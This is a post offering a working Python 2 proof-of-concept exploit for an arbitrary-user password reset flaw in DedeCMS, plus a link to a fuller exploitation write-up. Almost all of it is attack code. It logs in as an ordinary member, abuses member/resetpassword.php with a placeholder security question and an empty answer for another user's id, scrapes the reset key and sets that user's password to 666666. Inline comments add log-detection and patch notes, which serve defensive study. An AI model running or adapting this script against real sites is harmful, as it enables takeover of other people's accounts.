DeDecms(织梦CMS)最新版任意用户密码重置漏洞POC

poc:

# coding=utf-8

import re
import requests
from bs4 import BeautifulSoup

# Proof-of-concept for an arbitrary-user password reset in DedeCMS. Python 2
# only (print statements, str.decode()). It runs as an ordinary logged-in
# member and walks the member/resetpassword.php flow for a *different* user
# id. Defender notes: the decisive request is the one carrying
# dopost=safequestion, safequestion=0.0 and an empty safeanswer; a server
# that answers it with a reset link has not validated the security answer.
# A patched install should reject an empty or placeholder answer and compare
# the stored question/answer strictly. In web logs, look for
# resetpassword.php hits with dopost=safequestion and an empty safeanswer,
# followed by dopost=getpasswd from the same session for an id that differs
# from that session's DedeUserID.
if __name__ == "__main__":
    host = 'http://127.0.0.1/dedecms/'
    cookie = "PHPSESSID=hi7jm3fncr0q79du7tvu3bm406; DedeUserID=8; DedeUserID__ckMd5=7903ea0790a3690a; DedeLoginTime=1515641375; DedeLoginTime__ckMd5=0a847f5adbfcbbd4"
    # Session cookie of a registered (ordinary) member account.
    num = 2
    # id of the member whose password is to be reset (not the logged-in user).

    headers = {'Cookie': cookie}
    # Login check: the member home page is treated as "logged in" only when it
    # links to both myfriend.php and pm.php.
    rs = requests.get(host + '/member/index.php', headers=headers)
    if '/member/myfriend.php' in rs.text and '/member/pm.php' in rs.text:
        print '账号登陆成功'
    else:
        exit('账号登陆失败!')

    # Step 1: request the security-question reset path for the target id with
    # safequestion=0.0 and no answer at all.
    payload_url1 = "{host}/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id={num}".format(
        host=host,
        num=num)
    rs = requests.get(payload_url1, headers=headers)
    # The application rate-limits reset attempts (the "try again in 10
    # minutes" message). NOTE: exit() raises SystemExit, so the trailing
    # .decode('utf-8') on this line is never evaluated.
    if '对不起,请10分钟后再重新申请'.decode('utf-8') in rs.text:
        exit('对不起,请10分钟后再重新申请').decode('utf-8')

    # The response embeds the reset link as the first single-quoted href;
    # '&amp;' is unescaped so the link can be requested directly.
    searchObj = re.search(r'<a href=\'(.*?)\'>', rs.text, re.M | re.I)
    payload_url2 = searchObj.group(1)
    payload_url2 = payload_url2.replace('amp;', '')
    print 'Payload : ' + payload_url2
    # Step 2: load the reset form and read the userid/key fields it carries;
    # these are what the final step presents as authorisation.
    rs = requests.get(payload_url2, headers=headers)
    soup = BeautifulSoup(rs.text, "html.parser")
    userid = soup.find_all(attrs={"name": "userid"})[0]['value']
    key = soup.find_all(attrs={"name": "key"})[0]['value']
    # Step 3: submit the new password (666666) for the target id.
    data = {'dopost': 'getpasswd', 'setp': 2, 'id': num, 'userid': userid, 'key': key, 'pwd': 666666, 'pwdok': 666666}
    rs = requests.post(host + "/member/resetpassword.php", data=data, headers=headers)
    # Outcome is judged purely from the page text ("password changed" message).
    if '更改密码成功,请牢记新密码'.decode('utf-8') in rs.text:
        print '更改密码成功'.decode('utf-8')
        print '账号:'.decode('utf-8') + userid
        print '密码:'.decode('utf-8') + '666666'
    else:
        print '更改密码失败'.decode('utf-8')


详细利用过程:https://xianzhi.aliyun.com/forum/topic/1926 

